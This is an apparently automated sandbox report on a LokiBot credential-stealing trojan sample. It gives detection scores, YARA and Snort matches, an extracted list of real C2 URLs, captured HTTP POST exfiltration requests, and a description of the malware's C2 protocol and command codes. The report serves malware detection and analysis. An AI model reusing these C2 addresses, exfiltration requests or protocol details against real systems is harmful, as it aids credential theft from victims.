Edit tour

Windows Analysis Report
HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe

Overview

General Information

Sample Name:HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
Analysis ID:1286555
MD5:bf37ed340770102309554be2789becc4
SHA1:9710046d98ca399fa2ced91060acd98a126e56b3
SHA256:ba2fdc59950c64afa4429a28ff4036f496e519a867c3182e322d78c0eef27952
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Found API chain indicative of debugger detection
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{
  "C2 list": [
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
    "http://mecharnise.ir/da14/fre.php"
  ]
}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
            • 0x17936:$f1: FileZilla\recentservers.xml
            • 0x17976:$f2: FileZilla\sitemanager.xml
            • 0x15be6:$b2: Mozilla\Firefox\Profiles
            • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
            • 0x15afa:$s4: logins.json
            • 0x169a4:$s6: wand.dat
            • 0x15424:$a1: username_value
            • 0x15414:$a2: password_value
            • 0x15a5f:$a3: encryptedUsername
            • 0x15acc:$a3: encryptedUsername
            • 0x15a72:$a4: encryptedPassword
            • 0x15ae0:$a4: encryptedPassword
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 24 entries
              No Sigma rule has matched
              Timestamp:192.168.2.3185.8.173.8149698802825766 08/06/23-05:17:06.418971
              SID:2825766
              Source Port:49698
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149696802024312 08/06/23-05:17:03.087617
              SID:2024312
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149695802825766 08/06/23-05:17:01.315449
              SID:2825766
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149695802025381 08/06/23-05:17:01.315449
              SID:2025381
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149697802024313 08/06/23-05:17:04.705698
              SID:2024313
              Source Port:49697
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149697802825766 08/06/23-05:17:04.705698
              SID:2825766
              Source Port:49697
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149696802021641 08/06/23-05:17:03.087617
              SID:2021641
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149696802825766 08/06/23-05:17:03.087617
              SID:2825766
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149697802021641 08/06/23-05:17:04.705698
              SID:2021641
              Source Port:49697
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149698802025381 08/06/23-05:17:06.418971
              SID:2025381
              Source Port:49698
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149695802021641 08/06/23-05:17:01.315449
              SID:2021641
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149698802021641 08/06/23-05:17:06.418971
              SID:2021641
              Source Port:49698
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149697802025381 08/06/23-05:17:04.705698
              SID:2025381
              Source Port:49697
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149698802024313 08/06/23-05:17:06.418971
              SID:2024313
              Source Port:49698
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149696802025381 08/06/23-05:17:03.087617
              SID:2025381
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3185.8.173.8149695802024312 08/06/23-05:17:01.315449
              SID:2024312
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://mecharnise.ir/da14/fre.php"]}
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeReversingLabs: Detection: 84%
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeVirustotal: Detection: 83%Perma Link
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeAvira: detected
              Source: http://mecharnise.ir/da14/fre.php%Avira URL Cloud: Label: malware
              Source: https://mecharnise.ir/?s=Avira URL Cloud: Label: malware
              Source: https://mecharnise.ir/wp-json/Avira URL Cloud: Label: malware
              Source: https://mecharnise.ir/comments/feed/Avira URL Cloud: Label: malware
              Source: https://mecharnise.ir/feed/Avira URL Cloud: Label: malware
              Source: https://mecharnise.ir/Avira URL Cloud: Label: malware
              Source: http://mecharnise.ir/da14/fre.phpAAvira URL Cloud: Label: malware
              Source: https://mecharnise.ir/#websiteAvira URL Cloud: Label: malware
              Source: http://mecharnise.ir/da14/fre.phpAvira URL Cloud: Label: malware
              Source: mecharnise.irVirustotal: Detection: 18%Perma Link
              Source: https://mecharnise.ir/comments/feed/Virustotal: Detection: 16%Perma Link
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeJoe Sandbox ML: detected
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 4x nop then jl 00462FA8h
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 4x nop then push 00000000h

              Networking

              barindex
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49695 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49695 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49695 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49695 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49696 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49696 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49696 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49696 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49697 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49697 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49697 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49697 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49698 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49698 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49698 -> 185.8.173.81:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49698 -> 185.8.173.81:80
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://mecharnise.ir/da14/fre.php
              Source: Joe Sandbox ViewASN Name: PARVASYSTEMIR PARVASYSTEMIR
              Source: global trafficHTTP traffic detected: POST /da14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: mecharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 544679AContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /da14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: mecharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 544679AContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /da14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: mecharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 544679AContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /da14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: mecharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 544679AContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Aug 2023 03:17:05 GMTServer: Apache/2X-Powered-By: PHP/7.3.32Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mecharnise.ir/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 66 61 2d 49 52 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 5f 49 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 22 2c 22 6e 61 6d 65 22 3a 22 6d 65 63 68 61 72 6e 69 73 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Aug 2023 03:17:07 GMTServer: Apache/2X-Powered-By: PHP/7.3.32Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mecharnise.ir/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 66 61 2d 49 52 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 5f 49 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 22 2c 22 6e 61 6d 65 22 3a 22 6d 65 63 68 61 72 6e 69 73 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Aug 2023 03:17:09 GMTServer: Apache/2X-Powered-By: PHP/7.3.32Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mecharnise.ir/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 66 61 2d 49 52 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 5f 49 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 